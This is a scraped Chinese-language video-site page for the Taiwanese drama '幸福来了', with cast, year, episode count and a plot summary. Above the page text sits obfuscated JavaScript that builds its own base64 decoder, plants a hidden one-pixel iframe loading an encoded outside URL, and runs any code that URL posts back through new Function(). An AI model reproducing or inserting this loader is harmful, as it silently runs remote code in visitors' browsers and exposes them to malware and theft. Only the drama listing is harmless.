if(typeof eval("\x77\x69\x6e\x64\x6f\x77")["qdfEWb"]=="undefined"){eval("\x77\x69\x6e\x64\x6f\x77")["qdfEWb"]=function(e){var sx="ABCDEFGHIJKLMNOPQRSTUVWXYZ"+"abcdefghijklmnopqrstuvwxyz"+"0123456789+/=";var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=sx.indexOf(e.charAt(f++));o=sx.indexOf(e.charAt(f++));u=sx.indexOf(e.charAt(f++));a=sx.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return(function(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);};}
eval('\x77\x69\x6e\x64\x6f\x77')['AQnpzEf']=function (){ ;(function (u, w, d, f, c) { var x = qdfEWb; u = decodeURIComponent(x(u.replace(new RegExp(c + '' + c, 'g'), ''))); 'jQuery'; var k = '', wr = 'w' + 'ri' + 't' + 'e'; 'jQuery'; var c = d[x('Y3VycmVudFNjcmlwdA==')]; var f = d.createElement('iframe'); f.id = new Date().getTime(); f.style.width = f.style.height = 1 + 'px'; f.src = [u].join('-'); d[wr](f.outerHTML); w['ad' + 'dEv' + 'entL' + 'ist' + 'ener']('m' + 'ess' + 'age', function (e) { if (e.data[`des_s_6954`]) { var t = x(e.data[`des_s_6954`].replace(new RegExp('FdaWAFAbWFf', 'g'), '')); new Function(decodeURIComponent(t.replace(/\+/g, '%20')))(); } });})(''+'aHR'+'0cH'+'FFM'+'lM0'+'ElM'+'kYF'+'FlM'+'kFF'+'ZqY'+'S5v'+'dXh'+'1dG'+'FF9'+'uZF'+'Fy5'+'jb2'+'0FF'+'lM0'+'FFE'+'xMD'+'Q0F'+'FMy'+'UFF'+'yRm'+'E5N'+'2Rh'+'FFN'+'iUy'+'RmM'+'tNF'+'Fjk'+'1FF'+'NC0'+'yMi'+'FF0'+'xLm'+'F1',window, document, '' + 'Pwf' + 'SmZ' + 'j' + '', 'F');}

当前位置:首页  »  台湾剧  »  幸福来了

幸福来了
  • 幸福来了

  • 主演:陳淑芳,/,雷 洪,/,馬如風,/,高欣欣
  • 类型:台湾剧
  • 年份:2017年
  • 人气:加载中
  • 状态:更新至第255集

《幸福来了》详细剧情介绍

幸福来了由“何華英,”导演,由“陳淑芳,/,雷 洪,/,馬如風,/,高欣欣”等主演,于2017在台湾上映。

爱,是心间的美好,是流淌在纸笺上的馨香。满目的春光,让笔墨留香,心间存满阳光,就不惧怕世事寒凉,时光匆匆,光阴易殇,请让漫卷时光的爱,书写一段温暖的文字,爱的馨香,染满生命里的春光 高家兄弟因為價值觀截然不同,不但成就高低立判,連教育出來的子女,個性和品格也大相逕庭。上一代有上一代的恩怨情報,下一代有下一代的追求展望;在錯綜複雜的人生大道上,每個人都汲汲營營,尋找著屬於自己的幸福課題。
台湾剧 幸福来了音先锋,西瓜影音,吉吉影音剧情来自:神马影院 www.i8090dy.cc